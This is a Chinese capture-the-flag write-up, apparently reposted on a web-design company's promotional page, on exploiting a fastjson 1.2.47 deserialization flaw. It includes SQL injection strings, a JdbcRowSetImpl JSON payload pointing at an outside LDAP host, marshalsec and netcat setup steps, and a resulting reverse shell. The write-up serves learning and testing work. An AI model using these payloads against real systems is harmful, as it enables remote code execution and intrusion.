這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)如何進(jìn)行fastjson反序列化漏洞的分析,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
10年積累的網(wǎng)站設(shè)計(jì)制作、網(wǎng)站設(shè)計(jì)經(jīng)驗(yàn),可以快速應(yīng)對客戶對網(wǎng)站的新想法和需求。提供各種問題對應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識你,你也不認(rèn)識我。但先網(wǎng)站設(shè)計(jì)制作后付款的網(wǎng)站建設(shè)流程,更有嵊州免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。
拿到題目后,一開始通過審計(jì)代碼發(fā)現(xiàn)代碼
審計(jì)發(fā)現(xiàn)一個注入,dbname我們可控
嘗試注入
dbName=myapp#' and 1=2 union select name from myapp.user;# dbName=myapp#' and 1=2 union select pwd from myapp.user;#
注入處賬戶密碼留作備用(后面思路轉(zhuǎn)變?yōu)閑xp后發(fā)現(xiàn) 上面賬號密碼沒有用)
admin
admin@Rrrr_ctf_asde
然后經(jīng)過逆向注意到導(dǎo)入了
io.swagger.annotations.ApiOperation;
發(fā)現(xiàn)是個swagger
Swagger在平時日常工作中用過是個優(yōu)秀的文檔編輯器
那么直接訪問swagger-ui.html
這里想到swagger還有fastjson庫 可以將java對象轉(zhuǎn)換成json
19年爆出很多rce漏洞。嘗試進(jìn)行查看
網(wǎng)上查詢fastjson得知存在rce漏洞
這個文章真的寫的非常詳細(xì),可以說是手把手教學(xué)
https://github.com/CaijiOrz/fastjson-1.2.47-RCE
看到如下
這里很符合fastjson的反序列化漏洞的json格式
訪問得知如下
按著一步一步操作來,首先準(zhǔn)備云服務(wù)器,并將倉庫文件上傳到云服務(wù)器中。
上傳成功以后進(jìn)行如下操作
首先進(jìn)行測試
云服務(wù)器監(jiān)聽7777端口
在靶場執(zhí)行
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:7777/Exploit","autoCommit":true}}}
發(fā)現(xiàn)有流量回顯
那就繼續(xù)按照文檔往下做。
Cd進(jìn)去進(jìn)行查看
修改exploit.java的ip為云服務(wù)器ip
Javac Exploit.java編譯執(zhí)行后得到Exploit.class
繼續(xù)進(jìn)行按照如下步驟繼續(xù)執(zhí)行
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
http://121.36.19.222/#Exploit
執(zhí)行成功如下所示,進(jìn)行監(jiān)聽本地端口1389
python -m SimpleHTTPServer 80
Nc 監(jiān)聽本地的8888端口
提交payload
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:1389/Exploit","autoCommit":true}}}
執(zhí)行后成功
成功彈到shell ,
執(zhí)行cat /flag可以得到如下flag
日常實(shí)戰(zhàn)中,喜歡burp帶上fastjson的檢測腳本,遇到可疑的就發(fā)包檢測一下。顯示有漏洞就嘗試payload打一下DNSlog試試回顯,再進(jìn)一步進(jìn)行深挖。
上述就是小編為大家分享的如何進(jìn)行fastjson反序列化漏洞的分析了,如果剛好有類似的疑惑,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
標(biāo)題名稱:如何進(jìn)行fastjson反序列化漏洞的分析
標(biāo)題鏈接:http://bm7419.com/article2/gigpic.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供域名注冊、動態(tài)網(wǎng)站、靜態(tài)網(wǎng)站、網(wǎng)站改版、小程序開發(fā)、微信公眾號
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)